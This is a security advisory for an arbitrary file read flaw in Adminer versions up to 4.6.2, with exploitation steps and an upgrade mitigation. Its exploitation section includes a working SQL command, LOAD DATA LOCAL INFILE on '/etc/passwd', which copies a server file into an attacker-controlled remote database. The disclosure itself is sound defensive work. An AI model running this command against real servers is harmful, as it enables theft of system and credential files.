CVE-2021-xxxxx - Adminer < 4.6.3 - Arbitrary File Read

  • Titre : Adminer < 4.6.3 - Arbitrary File Read
  • Auteur : @Podalirius
  • CVSS : 7.5 (High)
  • CVSS Vector : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

Improper Access Control in Adminer versions <= 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the server by connecting a remote MySQL database to the Adminer.

Affected products and versions

To exploit this vulnerability, an attacker needs to access the login page of Adminer and connect back to a remote MySQL database he controls. Then he can read and exfiltrate local files on the Adminer using the SQL query LOAD DATA LOCAL INFILE

Exploitation

In order to exploit this vulnerability, an attacker needs to access the login page of Adminer and connect back to a remote MySQL database he controls:

After this, the attacker goes to the “SQL Command” page on the Adminer:

With the following SQL command, the attacker can read a local file on the Adminer server line and load it into his remote database:

LOAD DATA local INFILE '/etc/passwd' INTO TABLE lfr_sink_table fields TERMINATED BY "\n";

Once this is done, the attacker can view the contents of the read file with SELECT * FROM lfr_sink_table;:

All Adminer versions between 1.12.0 and 4.6.2 (included) are vulnerable:

Adminer vulnerable versions

Mitigations

In order to fix this vulnerability you need to update your Adminer to the latest version or a version >= 4.6.3. This vulnerability was fixed by the editor in version 4.6.3.

References